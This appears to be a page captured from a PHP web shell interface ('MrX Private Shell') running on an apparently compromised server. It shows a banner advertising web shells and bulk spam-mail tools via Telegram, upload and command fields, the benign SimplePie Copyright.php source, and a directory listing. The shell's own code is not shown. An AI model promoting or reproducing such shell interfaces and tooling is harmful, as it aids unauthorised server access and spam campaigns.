__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

// SPDX-FileCopyrightText: 2004-2023 Ryan Parman, Sam Sneddon, Ryan McCue
// SPDX-License-Identifier: BSD-3-Clause

declare(strict_types=1);

namespace SimplePie;

/**
 * Manages `<media:copyright>` copyright tags as defined in Media RSS
 *
 * Used by {@see \SimplePie\Enclosure::get_copyright()}
 *
 * This class can be overloaded with {@see \SimplePie\SimplePie::set_copyright_class()}
 */
class Copyright
{
    /**
     * Copyright URL
     *
     * @var ?string
     * @see get_url()
     */
    public $url;

    /**
     * Attribution
     *
     * @var ?string
     * @see get_attribution()
     */
    public $label;

    /**
     * Constructor, used to input the data
     *
     * For documentation on all the parameters, see the corresponding
     * properties and their accessors
     */
    public function __construct(
        ?string $url = null,
        ?string $label = null
    ) {
        $this->url = $url;
        $this->label = $label;
    }

    /**
     * String-ified version
     *
     * @return string
     */
    public function __toString()
    {
        // There is no $this->data here
        return md5(serialize($this));
    }

    /**
     * Get the copyright URL
     *
     * @return string|null URL to copyright information
     */
    public function get_url()
    {
        if ($this->url !== null) {
            return $this->url;
        }

        return null;
    }

    /**
     * Get the attribution text
     *
     * @return string|null
     */
    public function get_attribution()
    {
        if ($this->label !== null) {
            return $this->label;
        }

        return null;
    }
}

class_alias('SimplePie\Copyright', 'SimplePie_Copyright');

Filemanager

Name Type Size Permission Actions
Cache Folder 0775
Content Folder 0775
HTTP Folder 0775
Net Folder 0775
Parse Folder 0775
XML Folder 0775
Author.php File 1.86 KB 0664
Cache.php File 3.17 KB 0664
Caption.php File 3.03 KB 0664
Category.php File 2.41 KB 0664
Copyright.php File 1.67 KB 0664
Credit.php File 2.09 KB 0664
Enclosure.php File 31.39 KB 0664
Exception.php File 355 B 0664
File.php File 18.94 KB 0664
Gzdecode.php File 8.31 KB 0664
IRI.php File 33.99 KB 0664
Item.php File 128.54 KB 0664
Locator.php File 16.31 KB 0664
Misc.php File 68.16 KB 0664
Parser.php File 34.05 KB 0664
Rating.php File 1.75 KB 0664
Registry.php File 7.71 KB 0664
RegistryAware.php File 447 B 0664
Restriction.php File 2.31 KB 0664
Sanitize.php File 29.64 KB 0664
SimplePie.php File 125.05 KB 0664
Source.php File 23.18 KB 0664
Filemanager